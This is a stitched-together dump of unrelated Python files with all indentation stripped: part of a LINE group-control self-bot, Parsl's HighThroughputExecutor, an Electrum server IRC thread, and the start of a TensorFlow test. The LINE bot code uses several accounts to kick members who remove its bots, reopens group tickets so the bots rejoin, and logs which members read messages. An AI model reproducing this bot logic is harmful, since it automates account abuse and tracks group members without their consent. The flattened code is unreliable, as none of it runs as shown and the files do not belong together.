G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
elif op.param3 in ki5mid:
if op.param2 in ki4mid:
G = ki4.getGroup(op.param1)
G.preventJoinByTicket = False
ki4.updateGroup(G)
Ticket = ki4.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki4.updateGroup(G)
else:
G = ki4.getGroup(op.param1)
ki4.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki4.updateGroup(G)
Ticket = ki4.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki4.updateGroup(G)
elif op.param3 in ki6mid:
if op.param2 in ki5mid:
G = ki5.getGroup(op.param1)
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
else:
G = ki5.getGroup(op.param1)
ki5.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
except:
pass
if op.type == 55:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name
wait2['ROM'][op.param1][op.param2] = "・" + Name
else:
pass
if op.type == 59:
print op
except Exception as error:
print error
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT[14:] in ["10","20","30","40","50","00"]:
return False
else:
return True
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
executor.py
|
from concurrent.futures import Future
import typeguard
import logging
import threading
import queue
import datetime
import pickle
from multiprocessing import Queue
from typing import Dict # noqa F401 (used in type annotation)
from typing import List, Optional, Tuple, Union
import math
from parsl.serialize import pack_apply_message, deserialize
from parsl.app.errors import RemoteExceptionWrapper
from parsl.executors.high_throughput import zmq_pipes
from parsl.executors.high_throughput import interchange
from parsl.executors.errors import (
BadMessage, ScalingFailed,
DeserializationError, SerializationError,
UnsupportedFeatureError
)
from parsl.executors.status_handling import BlockProviderExecutor
from parsl.providers.provider_base import ExecutionProvider
from parsl.data_provider.staging import Staging
from parsl.addresses import get_all_addresses
from parsl.process_loggers import wrap_with_logs
from parsl.multiprocessing import ForkProcess
from parsl.utils import RepresentationMixin
from parsl.providers import LocalProvider
logger = logging.getLogger(__name__)
class HighThroughputExecutor(BlockProviderExecutor, RepresentationMixin):
"""Executor designed for cluster-scale
The HighThroughputExecutor system has the following components:
1. The HighThroughputExecutor instance which is run as part of the Parsl script.
2. The Interchange, which acts as a load-balancing proxy between workers and Parsl
3. The multiprocessing based worker pool which coordinates task execution over several
cores on a node.
4. ZeroMQ pipes connect the HighThroughputExecutor, Interchange and the process_worker_pool
Here is a diagram
.. code:: python
| Data | Executor | Interchange | External Process(es)
| Flow | | |
Task | Kernel | | |
+----->|-------->|------------>|->outgoing_q---|-> process_worker_pool
| | | | batching | | |
Parsl<---Fut-| | | load-balancing| result exception
^ | | | watchdogs | | |
| | | Q_mngmnt | | V V
| | | Thread<--|-incoming_q<---|--- +---------+
| | | | | |
| | | | | |
+----update_fut-----+
Each of the workers in each process_worker_pool has access to its local rank through
an environmental variable, ``PARSL_WORKER_RANK``. The local rank is unique for each process
and is an integer in the range from 0 to the number of workers in the pool minus 1.
The workers also have access to the ID of the worker pool as ``PARSL_WORKER_POOL_ID``
and the size of the worker pool as ``PARSL_WORKER_COUNT``.
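A worker could read these values at run time; the snippet below is an illustrative sketch,
not code taken from the shipped worker pool:
.. code:: python
    import os

    rank = int(os.environ["PARSL_WORKER_RANK"])        # unique per worker process
    pool_size = int(os.environ["PARSL_WORKER_COUNT"])  # number of workers in this pool
    pool_id = os.environ["PARSL_WORKER_POOL_ID"]       # identifies the pool/block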
Parameters
----------
provider : :class:`~parsl.providers.provider_base.ExecutionProvider`
Provider to access computation resources. Can be one of :class:`~parsl.providers.aws.aws.EC2Provider`,
:class:`~parsl.providers.cobalt.cobalt.Cobalt`,
:class:`~parsl.providers.condor.condor.Condor`,
:class:`~parsl.providers.googlecloud.googlecloud.GoogleCloud`,
:class:`~parsl.providers.gridEngine.gridEngine.GridEngine`,
:class:`~parsl.providers.local.local.Local`,
:class:`~parsl.providers.sge.sge.GridEngine`,
:class:`~parsl.providers.slurm.slurm.Slurm`, or
:class:`~parsl.providers.torque.torque.Torque`.
label : str
Label for this executor instance.
launch_cmd : str
Command line string to launch the process_worker_pool from the provider. The command line string
will be formatted with appropriate values for the following values (debug, task_url, result_url,
cores_per_worker, nodes_per_block, heartbeat_period, heartbeat_threshold, logdir). For example:
launch_cmd="process_worker_pool.py {debug} -c {cores_per_worker} --task_url={task_url} --result_url={result_url}"
address : string
An address to connect to the main Parsl process which is reachable from the network in which
workers will be running. This can be either a hostname as returned by ``hostname`` or an
IP address. Most login nodes on clusters have several network interfaces available, only
some of which can be reached from the compute nodes.
By default, the executor will attempt to enumerate and connect through all possible addresses.
Setting an address here overrides the default behavior.
default=None
worker_ports : (int, int)
Specify the ports to be used by workers to connect to Parsl. If this option is specified,
worker_port_range will not be honored.
worker_port_range : (int, int)
Worker ports will be chosen between the two integers provided.
interchange_port_range : (int, int)
Port range used by Parsl to communicate with the Interchange.
working_dir : str
Working dir to be used by the executor.
worker_debug : Bool
Enables worker debug logging.
managed : Bool
If this executor is managed by the DFK or externally handled.
cores_per_worker : float
cores to be assigned to each worker. Oversubscription is possible
by setting cores_per_worker < 1.0. Default=1
mem_per_worker : float
GB of memory required per worker. If this option is specified, the node manager
will check the available memory at startup and limit the number of workers such that
there is sufficient memory for each worker. Default: None
max_workers : int
Caps the number of workers launched per node. Default: infinity
cpu_affinity: string
Whether or how each worker process sets thread affinity. Options are "none" to forgo
any CPU affinity configuration, "block" to assign adjacent cores to workers
(ex: assign 0-1 to worker 0, 2-3 to worker 1), and
"alternating" to assign cores to workers in round-robin
(ex: assign 0,2 to worker 0, 1,3 to worker 1).
prefetch_capacity : int
Number of tasks that could be prefetched over available worker capacity.
When there are a few tasks (<100) or when tasks are long running, this option should
be set to 0 for better load balancing. Default is 0.
address_probe_timeout : int | None
Managers attempt connecting over many different addresses to determine a viable address.
This option sets a time limit in seconds on the connection attempt.
Default of None implies 30s timeout set on worker.
heartbeat_threshold : int
Seconds since the last message from the counterpart in the communication pair:
(interchange, manager) after which the counterpart is assumed to be unavailable. Default: 120s
heartbeat_period : int
Number of seconds after which a heartbeat message indicating liveness is sent to the
counterpart (interchange, manager). Default: 30s
poll_period : int
Timeout period to be used by the executor components in milliseconds. Increasing the poll_period
trades performance for CPU efficiency. Default: 10ms
worker_logdir_root : string
In case of a remote file system, specify the path to where logs will be kept.
"""
@typeguard.typechecked
def __init__(self,
label: str = 'HighThroughputExecutor',
provider: ExecutionProvider = LocalProvider(),
launch_cmd: Optional[str] = None,
address: Optional[str] = None,
worker_ports: Optional[Tuple[int, int]] = None,
worker_port_range: Optional[Tuple[int, int]] = (54000, 55000),
interchange_port_range: Optional[Tuple[int, int]] = (55000, 56000),
storage_access: Optional[List[Staging]] = None,
working_dir: Optional[str] = None,
worker_debug: bool = False,
cores_per_worker: float = 1.0,
mem_per_worker: Optional[float] = None,
max_workers: Union[int, float] = float('inf'),
cpu_affinity: str = 'none',
prefetch_capacity: int = 0,
heartbeat_threshold: int = 120,
heartbeat_period: int = 30,
poll_period: int = 10,
address_probe_timeout: Optional[int] = None,
managed: bool = True,
worker_logdir_root: Optional[str] = None):
logger.debug("Initializing HighThroughputExecutor")
BlockProviderExecutor.__init__(self, provider)
self.label = label
self.launch_cmd = launch_cmd
self.worker_debug = worker_debug
self.storage_access = storage_access
self.working_dir = working_dir
self.managed = managed
self.cores_per_worker = cores_per_worker
self.mem_per_worker = mem_per_worker
self.max_workers = max_workers
self.prefetch_capacity = prefetch_capacity
self.address = address
self.address_probe_timeout = address_probe_timeout
if self.address:
self.all_addresses = address
else:
self.all_addresses = ','.join(get_all_addresses())
mem_slots = max_workers
cpu_slots = max_workers
if hasattr(self.provider, 'mem_per_node') and \
self.provider.mem_per_node is not None and \
mem_per_worker is not None and \
mem_per_worker > 0:
mem_slots = math.floor(self.provider.mem_per_node / mem_per_worker)
if hasattr(self.provider, 'cores_per_node') and \
self.provider.cores_per_node is not None:
cpu_slots = math.floor(self.provider.cores_per_node / cores_per_worker)
self._workers_per_node = min(max_workers, mem_slots, cpu_slots)
if self._workers_per_node == float('inf'):
self._workers_per_node = 1 # our best guess-- we do not have any provider hints
self._task_counter = 0
self.run_id = None # set to the correct run_id in dfk
self.hub_address = None # set to the correct hub address in dfk
self.hub_port = None # set to the correct hub port in dfk
self.worker_ports = worker_ports
self.worker_port_range = worker_port_range
self.interchange_port_range = interchange_port_range
self.heartbeat_threshold = heartbeat_threshold
self.heartbeat_period = heartbeat_period
self.poll_period = poll_period
self.run_dir = '.'
self.worker_logdir_root = worker_logdir_root
self.cpu_affinity = cpu_affinity
if not launch_cmd:
self.launch_cmd = ("process_worker_pool.py {debug} {max_workers} "
"-a {addresses} "
"-p {prefetch_capacity} "
"-c {cores_per_worker} "
"-m {mem_per_worker} "
"--poll {poll_period} "
"--task_port={task_port} "
"--result_port={result_port} "
"--logdir={logdir} "
"--block_id={{block_id}} "
"--hb_period={heartbeat_period} "
"{address_probe_timeout_string} "
"--hb_threshold={heartbeat_threshold} "
"--cpu-affinity {cpu_affinity} ")
def initialize_scaling(self):
""" Compose the launch command and call the scale_out
This should be implemented in the child classes to take care of
executor specific oddities.
"""
debug_opts = "--debug" if self.worker_debug else ""
max_workers = "" if self.max_workers == float('inf') else "--max_workers={}".format(self.max_workers)
address_probe_timeout_string = ""
if self.address_probe_timeout:
address_probe_timeout_string = "--address_probe_timeout={}".format(self.address_probe_timeout)
worker_logdir = "{}/{}".format(self.run_dir, self.label)
if self.worker_logdir_root is not None:
worker_logdir = "{}/{}".format(self.worker_logdir_root, self.label)
l_cmd = self.launch_cmd.format(debug=debug_opts,
prefetch_capacity=self.prefetch_capacity,
address_probe_timeout_string=address_probe_timeout_string,
addresses=self.all_addresses,
task_port=self.worker_task_port,
result_port=self.worker_result_port,
cores_per_worker=self.cores_per_worker,
mem_per_worker=self.mem_per_worker,
max_workers=max_workers,
nodes_per_block=self.provider.nodes_per_block,
heartbeat_period=self.heartbeat_period,
heartbeat_threshold=self.heartbeat_threshold,
poll_period=self.poll_period,
logdir=worker_logdir,
cpu_affinity=self.cpu_affinity)
self.launch_cmd = l_cmd
logger.debug("Launch command: {}".format(self.launch_cmd))
self._scaling_enabled = True
logger.debug("Starting HighThroughputExecutor with provider:\n%s", self.provider)
# TODO: why is this a provider property?
block_ids = []
if hasattr(self.provider, 'init_blocks'):
try:
block_ids = self.scale_out(blocks=self.provider.init_blocks)
except Exception as e:
logger.error("Scaling out failed: {}".format(e))
raise e
return block_ids
def start(self):
"""Create the Interchange process and connect to it.
"""
self.outgoing_q = zmq_pipes.TasksOutgoing("127.0.0.1", self.interchange_port_range)
self.incoming_q = zmq_pipes.ResultsIncoming("127.0.0.1", self.interchange_port_range)
self.command_client = zmq_pipes.CommandClient("127.0.0.1", self.interchange_port_range)
self.is_alive = True
self._queue_management_thread = None
self._start_queue_management_thread()
self._start_local_queue_process()
logger.debug("Created management thread: {}".format(self._queue_management_thread))
block_ids = self.initialize_scaling()
return block_ids
@wrap_with_logs
def _queue_management_worker(self):
"""Listen to the queue for task status messages and handle them.
Depending on the message, tasks will be updated with results, exceptions,
or updates. It expects the following messages:
.. code:: python
{
"task_id" : <task_id>
"result" : serialized result object, if task succeeded
... more tags could be added later
}
{
"task_id" : <task_id>
"exception" : serialized exception object, on failure
}
We do not support these yet, but they could be added easily.
.. code:: python
{
"task_id" : <task_id>
"cpu_stat" : <>
"mem_stat" : <>
"io_stat" : <>
"started" : tstamp
}
The `None` message is a die request.
"""
logger.debug("[MTHREAD] queue management worker starting")
while not self.bad_state_is_set:
try:
msgs = self.incoming_q.get(timeout=1)
except queue.Empty:
logger.debug("[MTHREAD] queue empty")
# Timed out.
pass
except IOError as e:
logger.exception("[MTHREAD] Caught broken queue with exception code {}: {}".format(e.errno, e))
return
except Exception as e:
logger.exception("[MTHREAD] Caught unknown exception: {}".format(e))
return
else:
if msgs is None:
logger.debug("[MTHREAD] Got None, exiting")
return
else:
for serialized_msg in msgs:
try:
msg = pickle.loads(serialized_msg)
tid = msg['task_id']
except pickle.UnpicklingError:
raise BadMessage("Message received could not be unpickled")
except Exception:
raise BadMessage("Message received does not contain 'task_id' field")
if tid == -1 and 'exception' in msg:
logger.warning("Executor shutting down due to exception from interchange")
exception = deserialize(msg['exception'])
self.set_bad_state_and_fail_all(exception)
break
elif tid == -1 and 'heartbeat' in msg:
continue
task_fut = self.tasks.pop(tid)
if 'result' in msg:
result = deserialize(msg['result'])
task_fut.set_result(result)
elif 'exception' in msg:
try:
s = deserialize(msg['exception'])
# s should be a RemoteExceptionWrapper... so we can reraise it
if isinstance(s, RemoteExceptionWrapper):
try:
s.reraise()
except Exception as e:
task_fut.set_exception(e)
elif isinstance(s, Exception):
task_fut.set_exception(s)
else:
raise ValueError("Unknown exception-like type received: {}".format(type(s)))
except Exception as e:
# TODO could be a proper wrapped exception?
task_fut.set_exception(
DeserializationError("Received exception, but handling also threw an exception: {}".format(e)))
else:
raise BadMessage("Message received is neither result or exception")
if not self.is_alive:
break
logger.info("[MTHREAD] queue management worker finished")
def _start_local_queue_process(self):
""" Starts the interchange process locally
Starts the interchange process locally and uses an internal command queue to
get the worker task and result ports that the interchange has bound to.
"""
comm_q = Queue(maxsize=10)
self.queue_proc = ForkProcess(target=interchange.starter,
args=(comm_q,),
kwargs={"client_ports": (self.outgoing_q.port,
self.incoming_q.port,
self.command_client.port),
"worker_ports": self.worker_ports,
"worker_port_range": self.worker_port_range,
"hub_address": self.hub_address,
"hub_port": self.hub_port,
"logdir": "{}/{}".format(self.run_dir, self.label),
"heartbeat_threshold": self.heartbeat_threshold,
"poll_period": self.poll_period,
"logging_level": logging.DEBUG if self.worker_debug else logging.INFO
},
daemon=True,
name="HTEX-Interchange"
)
self.queue_proc.start()
try:
(self.worker_task_port, self.worker_result_port) = comm_q.get(block=True, timeout=120)
except queue.Empty:
logger.error("Interchange has not completed initialization in 120s. Aborting")
raise Exception("Interchange failed to start")
def _start_queue_management_thread(self):
"""Method to start the management thread as a daemon.
Checks if a thread already exists, then starts it.
Could be used later as a restart if the management thread dies.
"""
if self._queue_management_thread is None:
logger.debug("Starting queue management thread")
self._queue_management_thread = threading.Thread(target=self._queue_management_worker, name="HTEX-Queue-Management-Thread")
self._queue_management_thread.daemon = True
self._queue_management_thread.start()
logger.debug("Started queue management thread")
else:
logger.debug("Management thread already exists, returning")
def hold_worker(self, worker_id):
"""Puts a worker on hold, preventing scheduling of additional tasks to it.
This is called "hold" mostly because this only stops scheduling of tasks,
and does not actually kill the worker.
Parameters
----------
worker_id : str
Worker id to be put on hold
"""
c = self.command_client.run("HOLD_WORKER;{}".format(worker_id))
logger.debug("Sent hold request to manager: {}".format(worker_id))
return c
@property
def outstanding(self):
outstanding_c = self.command_client.run("OUTSTANDING_C")
return outstanding_c
@property
def connected_workers(self):
workers = self.command_client.run("WORKERS")
return workers
@property
def connected_managers(self):
workers = self.command_client.run("MANAGERS")
return workers
def _hold_block(self, block_id):
""" Sends hold command to all managers which are in a specific block
Parameters
----------
block_id : str
Block identifier of the block to be put on hold
"""
managers = self.connected_managers
for manager in managers:
if manager['block_id'] == block_id:
logger.debug("[HOLD_BLOCK]: Sending hold to manager: {}".format(manager['manager']))
self.hold_worker(manager['manager'])
def submit(self, func, resource_specification, *args, **kwargs):
"""Submits work to the the outgoing_q.
The outgoing_q is an external process listens on this
queue for new work. This method behaves like a
submit call as described here `Python docs: <https://docs.python.org/3/library/concurrent.futures.html#concurrent.futures.ThreadPoolExecutor>`_
Args:
- func (callable) : Callable function
- args (list) : List of arbitrary positional arguments.
Kwargs:
- kwargs (dict) : A dictionary of arbitrary keyword args for func.
Returns:
Future
"""
if resource_specification:
logger.error("Ignoring the resource specification. "
"Parsl resource specification is not supported in HighThroughput Executor. "
"Please check WorkQueueExecutor if resource specification is needed.")
raise UnsupportedFeatureError('resource specification', 'HighThroughput Executor', 'WorkQueue Executor')
if self.bad_state_is_set:
raise self.executor_exception
self._task_counter += 1
task_id = self._task_counter
# handle people sending blobs gracefully
args_to_print = args
if logger.getEffectiveLevel() >= logging.DEBUG:
args_to_print = tuple([arg if len(repr(arg)) < 100 else (repr(arg)[:100] + '...') for arg in args])
logger.debug("Pushing function {} to queue with args {}".format(func, args_to_print))
fut = Future()
self.tasks[task_id] = fut
try:
fn_buf = pack_apply_message(func, args, kwargs,
buffer_threshold=1024 * 1024)
except TypeError:
raise SerializationError(func.__name__)
msg = {"task_id": task_id,
"buffer": fn_buf}
# Post task to the outgoing queue
self.outgoing_q.put(msg)
# Return the future
return fut
@property
def scaling_enabled(self):
return self._scaling_enabled
def create_monitoring_info(self, status):
""" Create a msg for monitoring based on the poll status
"""
msg = []
for bid, s in status.items():
d = {}
d['run_id'] = self.run_id
d['status'] = s.status_name
d['timestamp'] = datetime.datetime.now()
d['executor_label'] = self.label
d['job_id'] = self.blocks.get(bid, None)
d['block_id'] = bid
msg.append(d)
return msg
@property
def workers_per_node(self) -> Union[int, float]:
return self._workers_per_node
def scale_in(self, blocks=None, block_ids=[], force=True, max_idletime=None):
"""Scale in the number of active blocks by specified amount.
The scale in method here is very rude. It doesn't give the workers
the opportunity to finish current tasks or cleanup. This is tracked
in issue #530
Parameters
----------
blocks : int
Number of blocks to terminate and scale_in by
force : Bool
Used along with blocks to indicate whether blocks should be terminated by force.
When force = True, we will kill blocks regardless of whether they are busy.
When force = False, only idle blocks will be terminated.
If the # of ``idle_blocks`` < ``blocks``, the list of jobs marked for termination
will be in the range: 0 - ``blocks``.
max_idletime: float
A time to indicate how long a block can be idle.
Used along with force = False to kill blocks that have been idle for that long.
block_ids : list
List of specific block ids to terminate. Optional
Returns
-------
List of job_ids marked for termination
"""
if block_ids:
block_ids_to_kill = block_ids
else:
managers = self.connected_managers
block_info = {}
for manager in managers:
if not manager['active']:
continue
b_id = manager['block_id']
if b_id not in block_info:
block_info[b_id] = [0, float('inf')]
block_info[b_id][0] += manager['tasks']
block_info[b_id][1] = min(block_info[b_id][1], manager['idle_duration'])
sorted_blocks = sorted(block_info.items(), key=lambda item: (item[1][1], item[1][0]))
if force is True:
block_ids_to_kill = [x[0] for x in sorted_blocks[:blocks]]
else:
if not max_idletime:
block_ids_to_kill = [x[0] for x in sorted_blocks if x[1][0] == 0][:blocks]
else:
block_ids_to_kill = []
for x in sorted_blocks:
if x[1][1] > max_idletime and x[1][0] == 0:
block_ids_to_kill.append(x[0])
if len(block_ids_to_kill) == blocks:
break
logger.debug("Selecting block ids to kill since they are idle : {}".format(
block_ids_to_kill))
logger.debug("Current blocks : {}".format(self.blocks))
# Hold the block
for block_id in block_ids_to_kill:
self._hold_block(block_id)
# Now kill via provider
# Potential issue with multiple threads trying to remove the same blocks
to_kill = [self.blocks[bid] for bid in block_ids_to_kill if bid in self.blocks]
r = self.provider.cancel(to_kill)
job_ids = self._filter_scale_in_ids(to_kill, r)
# to_kill block_ids are fetched from self.blocks
# If a block_id is in self.blocks, it must exist in self.block_mapping
block_ids_killed = [self.block_mapping[jid] for jid in job_ids]
return block_ids_killed
def _get_launch_command(self, block_id: str) -> str:
if self.launch_cmd is None:
raise ScalingFailed(self.provider.label, "No launch command")
launch_cmd = self.launch_cmd.format(block_id=block_id)
return launch_cmd
def shutdown(self):
"""Shutdown the executor, including all workers and controllers.
"""
logger.info("Attempting HighThroughputExecutor shutdown")
self.queue_proc.terminate()
logger.info("Finished HighThroughputExecutor shutdown attempt")
|
ircthread.py
|
#!/usr/bin/env python
# Copyright(C) 2011-2016 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import re
import time
import socket
import ssl
import threading
import Queue
import irc.client
from utils import logger
from utils import Hash
from version import VERSION
out_msg = []
class IrcThread(threading.Thread):
def __init__(self, processor, config):
threading.Thread.__init__(self)
self.processor = processor
self.daemon = True
options = dict(config.items('server'))
self.stratum_tcp_port = options.get('stratum_tcp_port')
self.stratum_tcp_ssl_port = options.get('stratum_tcp_ssl_port')
self.report_stratum_tcp_port = options.get('report_stratum_tcp_port')
self.report_stratum_tcp_ssl_port = options.get('report_stratum_tcp_ssl_port')
self.irc_bind_ip = options.get('irc_bind_ip')
self.host = options.get('host')
self.report_host = options.get('report_host')
self.nick = options.get('irc_nick')
self.irc_prefix = options.get('irc_prefix')
if self.report_stratum_tcp_port:
self.stratum_tcp_port = self.report_stratum_tcp_port
if self.report_stratum_tcp_ssl_port:
self.stratum_tcp_ssl_port = self.report_stratum_tcp_ssl_port
if self.report_host:
self.host = self.report_host
if not self.nick:
self.nick = Hash(self.host)[:5].encode("hex")
if not self.irc_prefix:
self.irc_prefix = 'D_'
self.pruning = True
self.pruning_limit = config.get('leveldb', 'pruning_limit')
self.nick = self.irc_prefix + self.nick
self.password = None
self.who_queue = Queue.Queue()
def getname(self):
s = 'v' + VERSION + ' '
if self.pruning:
s += 'p' + self.pruning_limit + ' '
def add_port(letter, number):
DEFAULT_PORTS = {'t':'50001', 's':'50002'}
if not number: return ''
if DEFAULT_PORTS[letter] == number:
return letter + ' '
else:
return letter + number + ' '
s += add_port('t',self.stratum_tcp_port)
s += add_port('s',self.stratum_tcp_ssl_port)
return s
def start(self, queue):
self.queue = queue
threading.Thread.start(self)
def on_connect(self, connection, event):
connection.join("#electrum-deviant")
def on_join(self, connection, event):
m = re.match("("+self.irc_prefix+".*)!", event.source)
if m:
self.who_queue.put((connection, m.group(1)))
def on_quit(self, connection, event):
m = re.match("("+self.irc_prefix+"..*)!", event.source)
if m:
self.queue.put(('quit', [m.group(1)]))
def on_kick(self, connection, event):
m = re.match("("+self.irc_prefix+"..*)", event.arguments[0])
if m:
self.queue.put(('quit', [m.group(1)]))
def on_disconnect(self, connection, event):
logger.error("irc: disconnected")
raise BaseException("disconnected")
def on_who(self, connection, event):
line = str(event.arguments[6]).split()
try:
ip = socket.gethostbyname(line[1])
except:
# no IPv4 address could be resolved. Could be .onion or IPv6.
ip = line[1]
nick = event.arguments[4]
host = line[1]
ports = line[2:]
self.queue.put(('join', [nick, ip, host, ports]))
def on_name(self, connection, event):
for s in event.arguments[2].split():
if s.startswith(self.irc_prefix):
self.who_queue.put((connection, s))
def who_thread(self):
while not self.processor.shared.stopped():
try:
connection, s = self.who_queue.get(timeout=1)
except Queue.Empty:
continue
#logger.info("who: "+ s)
connection.who(s)
time.sleep(1)
def run(self):
while self.processor.shared.paused():
time.sleep(1)
self.ircname = self.host + ' ' + self.getname()
# avoid UnicodeDecodeError using LenientDecodingLineBuffer
irc.client.ServerConnection.buffer_class = irc.buffer.LenientDecodingLineBuffer
logger.info("joining IRC")
t = threading.Thread(target=self.who_thread)
t.start()
while not self.processor.shared.stopped():
client = irc.client.Reactor()
try:
#bind_address = (self.irc_bind_ip, 0) if self.irc_bind_ip else None
#ssl_factory = irc.connection.Factory(wrapper=ssl.wrap_socket, bind_address=bind_address)
#c = client.server().connect('irc.freenode.net', 6697, self.nick, self.password, ircname=self.ircname, connect_factory=ssl_factory)
c = client.server().connect('irc.freenode.net', 6667, self.nick, self.password, ircname=self.ircname)
except irc.client.ServerConnectionError:
logger.error('irc', exc_info=True)
time.sleep(10)
continue
c.add_global_handler("welcome", self.on_connect)
c.add_global_handler("join", self.on_join)
c.add_global_handler("quit", self.on_quit)
c.add_global_handler("kick", self.on_kick)
c.add_global_handler("whoreply", self.on_who)
c.add_global_handler("namreply", self.on_name)
c.add_global_handler("disconnect", self.on_disconnect)
c.set_keepalive(60)
self.connection = c
try:
client.process_forever()
except BaseException as e:
logger.error('irc', exc_info=True)
time.sleep(10)
continue
logger.info("quitting IRC")
|
debug_events_writer_test.py
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the debug events writer Python class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import glob
import os
import threading
import time
from tensorflow.core.protobuf import debug_event_pb2
from tensorflow.python.debug.lib import debug_events_reader
from tensorflow.python.debug.lib import debug_events_writer
from tensorflow.python.debug.lib import dumping_callback_test_lib
from tensorflow.python.framework import ops
from tensorflow.python.framework import versions
from tensorflow.python.platform import googletest
class DebugEventsWriterTest(dumping_callback_test_lib.DumpingCallbackTestBase):
def testMultiThreadedConstructorCallWorks(self):
def InitWriter():
debug_events_writer.DebugEventsWriter(self.dump_root)
num_threads = 4
threads = []
for _ in range(num_threads):
thread = threading.Thread(target=InitWriter)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
# Verify that there is only one debug event file of each type.
metadata_paths = glob.glob(os.path.join(self.dump_root, "*.metadata"))
self.assertEqual(len(metadata_paths), 1)
source_files_paths = glob.glob(
os.path.join(self.dump_root, "*.source_files"))
self.assertEqual(len(source_files_paths), 1)
stack_frames_paths = glob.glob(
os.path.join(self.dump_root, "*.stack_frames"))
self.assertEqual(len(stack_frames_paths), 1)
graphs_paths = glob.glob(os.path.join(self.dump_root, "*.graphs"))
self.assertEqual(len(graphs_paths), 1)
self._readAndCheckMetadataFile()
def testWriteSourceFilesAndStackFrames(self):
writer = debug_events_writer.DebugEventsWriter(self.dump_root)
num_protos = 10
for i in range(num_protos):
source_file = debug_event_pb2.SourceFile()
source_file.file_path = "/home/tf2user/main.py"
source_file.host_name = "machine.cluster"
source_file.lines.append("print(%d)" % i)
writer.WriteSourceFile(source_file)
